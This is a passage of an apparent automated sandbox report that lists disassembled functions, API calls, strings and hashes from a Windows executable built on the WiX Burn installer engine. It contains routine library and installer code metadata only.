                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectSingleNode$pixnParent parameter was null in XmlSelectSingleNode$ppixnChild parameter was null in XmlSelectSingleNode
                                                                                                                                                                                                                                                                            • API String ID: 344208780-1462723567
                                                                                                                                                                                                                                                                            • Opcode ID: ff27af4fe9f9198b2d9050b2bbe812007a36056fe3d9b2c3c0ce88445b54fe64
                                                                                                                                                                                                                                                                            • Instruction ID: a4d8621327833f11a149fc59aa8aea84e10a6080058c55c9ca8228c45ca04a51
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff27af4fe9f9198b2d9050b2bbe812007a36056fe3d9b2c3c0ce88445b54fe64
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E110672B80351B7EB311A194C4EF7F229CEBD6B59F018139BA04BB2C1E6B49D0592A1
                                                                                                                                                                                                                                                                            Function 00932BC3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00932CD2,?,?,00000000,?,?,?,00932E2C,00000022,FlsSetValue,0096DA4C,0096DA54,?), ref: 00932C84
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                            • Opcode ID: c44b964c8ec8d1ba943e7307bea63f8c48d7622ba22bca6efa0f355fa04123f3
                                                                                                                                                                                                                                                                            • Instruction ID: 3d64f865941051d2c4ab490f4adc739310df31719229f6399f90dfe472a5684a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c44b964c8ec8d1ba943e7307bea63f8c48d7622ba22bca6efa0f355fa04123f3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F021E436A05211ABCB219F24DC41E6F376CAF42B64F241160FD95A72D4E670ED00DED0
                                                                                                                                                                                                                                                                            Function 008ED783 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 008ED825
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Condition, xrefs: 008ED790
                                                                                                                                                                                                                                                                            • Failed to copy condition string from BSTR, xrefs: 008ED7FE
                                                                                                                                                                                                                                                                            • Failed to select condition node., xrefs: 008ED7B2
                                                                                                                                                                                                                                                                            • Failed to get Condition inner text., xrefs: 008ED7D8
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\condition.cpp, xrefs: 008ED810
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$d:\a\wix4\wix4\src\burn\engine\condition.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-1135705897
                                                                                                                                                                                                                                                                            • Opcode ID: 62cb600597f644b73e28850ce630e36fcd6deece7fc8ee3be5c7224f50c5d0b7
                                                                                                                                                                                                                                                                            • Instruction ID: b586ebfbf7bdfe215724084251de31286f5fa34c8d5c1d30a77ea2f825a7a62d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62cb600597f644b73e28850ce630e36fcd6deece7fc8ee3be5c7224f50c5d0b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A113635740364BBDB22DB12CC06F5F7B39EBC6F11F104025B900F7290DAB09A089650
                                                                                                                                                                                                                                                                            Function 00948BE1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00948C80
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Already process this datetime value.$Failed to convert value to time.$Failed to get value.$clbcatq.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-436059191
                                                                                                                                                                                                                                                                            • Opcode ID: 69aa6d01eb55a69af8fd790c0b67661ea0997cb3791db3c849046a6092322346
                                                                                                                                                                                                                                                                            • Instruction ID: ac53830b3e91c8a2b5fd3c6b839686101de1d3bd3d923ed5af442e4d24e5635d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69aa6d01eb55a69af8fd790c0b67661ea0997cb3791db3c849046a6092322346
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 121127B1A82215BBDB315F558C8AF6FBA6CEB50B66F118135F704BB180EB709D00D6E0
                                                                                                                                                                                                                                                                            Function 00941BF5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • PathAllocCanonicalize.KERNELBASE(?,?,00941D45), ref: 00941C32
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,?,00941D45,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00941C9F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to initialize path2utl., xrefs: 00941C79
                                                                                                                                                                                                                                                                            • Failed to canonicalize: %ls, xrefs: 00941C3D
                                                                                                                                                                                                                                                                            • Failed to copy the canonicalized path., xrefs: 00941C6B
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 00941C49, 00941C85
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocCanonicalizeFreeLocalPath
                                                                                                                                                                                                                                                                            • String ID: Failed to canonicalize: %ls$Failed to copy the canonicalized path.$Failed to initialize path2utl.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2828741713-2733107982
                                                                                                                                                                                                                                                                            • Opcode ID: 6f8a2f917d4430ff6ec1b7310a6294f9db8afa21895eb05c3bdd4f02d3754e73
                                                                                                                                                                                                                                                                            • Instruction ID: bbc2509b9c75fe33c76d08e8cfe4257ef5cbce31629caa25869d0a63e45679ac
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f8a2f917d4430ff6ec1b7310a6294f9db8afa21895eb05c3bdd4f02d3754e73
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11E772FD1334B7DB325B548D0EF9E3A94EB06F92F014111F908BA1D1E3A09D8096D1
                                                                                                                                                                                                                                                                            Function 00944CDA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56comCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,200001A4,00000000,00000000,00000000,200001A4,?,0090B002,00000000), ref: 00944D02
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00000000,00000000,00000001,00979150,00000000,?,0090B002,00000000), ref: 00944D2A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get CLSID for Microsoft.Update.AutoUpdate., xrefs: 00944D0E
                                                                                                                                                                                                                                                                            • Microsoft.Update.AutoUpdate, xrefs: 00944CFD
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wuautil.cpp, xrefs: 00944D42
                                                                                                                                                                                                                                                                            • Failed to create instance of Microsoft.Update.AutoUpdate., xrefs: 00944D36
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                                                                            • String ID: Failed to create instance of Microsoft.Update.AutoUpdate.$Failed to get CLSID for Microsoft.Update.AutoUpdate.$Microsoft.Update.AutoUpdate$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wuautil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2151042543-594154128
                                                                                                                                                                                                                                                                            • Opcode ID: be43af31c0a7198d69bc0f29b3eaf265ad0cfbf78ae598b0c82b404322d94a35
                                                                                                                                                                                                                                                                            • Instruction ID: caab62d0a8aee22100aaac92ffb84f21135c192f3897ca8d46ce119a8f1b7f00
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be43af31c0a7198d69bc0f29b3eaf265ad0cfbf78ae598b0c82b404322d94a35
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C01DD72B44715B7D7219AA8DC46FAF77A8DB44B54F410025FB04FB2C1D5A0ED04C6E2
                                                                                                                                                                                                                                                                            Function 008E6BE8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E6BE8
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 008E6DBC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E6DCB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCriticalDeleteErrorHandleLastSection
                                                                                                                                                                                                                                                                            • String ID: Failed to create semaphore for queue.$d:\a\wix4\wix4\src\burn\engine\engine.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 596325006-972025716
                                                                                                                                                                                                                                                                            • Opcode ID: b2388c66b07afe564a142d952f0fbe53dc62a1888989fc1a5680fb1deeae1500
                                                                                                                                                                                                                                                                            • Instruction ID: 5273168af1c75489ce411e549109e342c696da6f9901eacf7d1eff5a46c9c859
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2388c66b07afe564a142d952f0fbe53dc62a1888989fc1a5680fb1deeae1500
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83019272A00365ABDB11DBA99C4AFDDB7B8FB16361F040015FA01FA191E2759D10CBA0
                                                                                                                                                                                                                                                                            Function 0094C480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0094C4FB,0094C6A4), ref: 0094C497
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0094C4AD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0094C4C2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                                            • API String ID: 667068680-1718035505
                                                                                                                                                                                                                                                                            • Opcode ID: 7271ca1507df1fd82bbb6a2fed8824b10e8104388cae6d5ae1084db8faea1ce4
                                                                                                                                                                                                                                                                            • Instruction ID: 25b5e0a82356f157efc0157af2ef42dd9a1d4651863845c288aab234989d2171
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7271ca1507df1fd82bbb6a2fed8824b10e8104388cae6d5ae1084db8faea1ce4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF0F6FA76F222DF9BF00F649FE5D7622DCEE427693044139E819E3270E650CC81A290
                                                                                                                                                                                                                                                                            Function 009260EC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(009260E3,?,00000000,?,009260E3,00000000), ref: 00926100
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(0CC2C95B,?,00000000,?,009260E3,00000000), ref: 00926110
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(EC8B5500,?,00000000,?,009260E3,00000000), ref: 00926121
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(08758B56,?,00000000,?,009260E3,00000000), ref: 00926132
                                                                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(5974F685,00000000,?,009260E3,00000000), ref: 00926144
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 260491571-727612987
                                                                                                                                                                                                                                                                            • Opcode ID: a8b9a61e0273e2e89a79b645771a4860e64b3f839bce2911d94f5b3330951dfe
                                                                                                                                                                                                                                                                            • Instruction ID: 4ed67a714ee0c016446e49a021f32b569ebc9f4adc37a2e869fb00114bb3a40f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8b9a61e0273e2e89a79b645771a4860e64b3f839bce2911d94f5b3330951dfe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E901243540AB21DFC7235F55EC04826FBF8FF95B52314892DE4A652A2AC332B861EF40
                                                                                                                                                                                                                                                                            Function 009298BA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,009298B1,009296CC,00927194), ref: 009298C8
                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009298D6
                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009298EF
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,009298B1,009296CC,00927194), ref: 00929941
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                            • Opcode ID: d68fdd6972651d630ea3068b791f24b48e56549ee8c0cd266cbc14da0effb27d
                                                                                                                                                                                                                                                                            • Instruction ID: 29e3bb73cbd9a0d0ed26494cc2eeb0b8b400f85f50c95d32acd964c4b972720b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d68fdd6972651d630ea3068b791f24b48e56549ee8c0cd266cbc14da0effb27d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701847713E3329EEB2527797C85B6A2658FF427B4F20023DF514550E9EE514C81A194
                                                                                                                                                                                                                                                                            Function 008EA8A3 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(008E7D5B,WixBundleOriginalSource,?,?,008FF8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,008E7D5B,?,00000001,008E7DDB,?,?), ref: 008EA8AF
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(008E7D5B,008E7D5B,00000000,00000000,?,?,008FF8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,008E7D5B,?,00000001,008E7DDB), ref: 008EA934
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • WixBundleOriginalSource, xrefs: 008EA8AB
                                                                                                                                                                                                                                                                            • Failed to get value as string for variable: %ls, xrefs: 008EA912
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA924
                                                                                                                                                                                                                                                                            • Failed to get value of variable: %ls, xrefs: 008EA8E9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-3124624316
                                                                                                                                                                                                                                                                            • Opcode ID: 55f4a563effd42d2a31ec7169e0d97ad75be3ad26371ba93c2fc4a059b2e65f8
                                                                                                                                                                                                                                                                            • Instruction ID: 592595e71b1816333883932d3ef4d5ef4707e5d7616a89f4b4dbf9e9093ae7e1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55f4a563effd42d2a31ec7169e0d97ad75be3ad26371ba93c2fc4a059b2e65f8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26010835A41269FBCF215F51CC09F9E3E68FF02B65F114020FD14E91A1D3B5AA109791
                                                                                                                                                                                                                                                                            Function 00900121 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,024B6805,000000FF,comres.dll,000000FF,00000000,?,00000000,00000000,comres.dll,wininet.dll,00000000,008E6DEA,00000000,FF1C4389), ref: 00900207
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
